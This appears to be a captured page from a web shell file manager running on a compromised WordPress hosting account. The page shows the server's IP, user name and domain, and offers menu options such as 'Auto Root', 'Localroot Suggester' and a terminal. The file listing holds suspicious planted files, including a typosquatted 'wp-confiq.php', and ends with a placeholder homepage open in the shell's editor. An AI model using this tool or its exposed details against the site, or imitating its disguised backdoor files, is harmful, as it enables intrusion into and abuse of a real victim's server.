Linux premium82.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.194 & Your IP : 216.73.216.196
Domains :
Cant Read [ /etc/named.conf ]
User : evicodqw
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
evicodqw /
llblegalmarketing.co.uk /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-06-19 07:56
imgs
[ DIR ]
drwxr-xr-x
2025-07-10 07:55
wp-admin
[ DIR ]
drwxr-xr-x
2025-07-05 14:33
wp-content
[ DIR ]
drwxr-xr-x
2025-07-05 14:33
wp-includes
[ DIR ]
dr-xr-xr-x
2025-07-07 07:36
.htaccess
564
B
-r--r--r--
2025-07-10 08:40
.litespeed_flag
297
B
-rw-r--r--
2025-07-13 01:32
d.php
19
B
-rw-r--r--
2025-07-12 11:13
dim.txt
19
B
-rw-r--r--
2025-07-12 11:14
error_log
380.21
KB
-rw-r--r--
2025-07-02 23:28
google859da433f7f5a2b3.html
53
B
-rw-r--r--
2025-07-10 01:32
grow-a-digital-marketing-agency.jpg
178.96
KB
-rw-r--r--
2023-08-25 23:55
index.html
1.95
KB
-rw-r--r--
2025-07-12 11:14
index.php
5.33
KB
-rw-r--r--
2025-07-10 08:40
wp-blog-header.php
2.73
KB
-rw-r--r--
2025-06-23 02:50
wp-confiq.php
59.05
KB
-rw-r--r--
2025-07-10 08:39
wp-cron.php
2.73
KB
-rw-r--r--
2025-06-23 02:50
Save
Rename
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>My WordPress-Like Site</title> <link rel="icon" href="https://s.w.org/favicon.ico" type="image/x-icon" /> <style> body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; margin: 0; padding: 0; background: #f1f1f1; color: #333; } header { background: #0073aa; color: white; padding: 20px; text-align: center; } header h1 { margin: 0; font-size: 2em; } nav { background: #23282d; padding: 10px; text-align: center; } nav a { color: #ddd; margin: 0 15px; text-decoration: none; font-weight: bold; } nav a:hover { color: #fff; } main { max-width: 800px; margin: 20px auto; background: white; padding: 20px; box-shadow: 0 0 10px rgba(0,0,0,0.1); } footer { text-align: center; padding: 15px; background: #23282d; color: #bbb; font-size: 14px; } </style> </head> <body> <header> <h1><?php echo $_SERVER['HTTP_HOST']; ?></h1> <p>Your default WordPress-style homepage</p> </header> <nav> <a href="#">Home</a> <a href="#">Blog</a> <a href="#">About</a> <a href="#">Contact</a> </nav> <main> <h2>Welcome to My WordPress-like Page</h2> <p>This is a simple, clean default-style layout inspired by WordPress. You can customize this template to create your own PHP site easily.</p> <p>Start editing here. Add your blog posts, pages, or any content you want!</p> </main> <footer> © <?php echo date("Y"); ?> <?php echo $_SERVER['HTTP_HOST']; ?> — Powered by WordPress </footer> <script> console.log("WordPress-like layout loaded."); </script> </body> </html>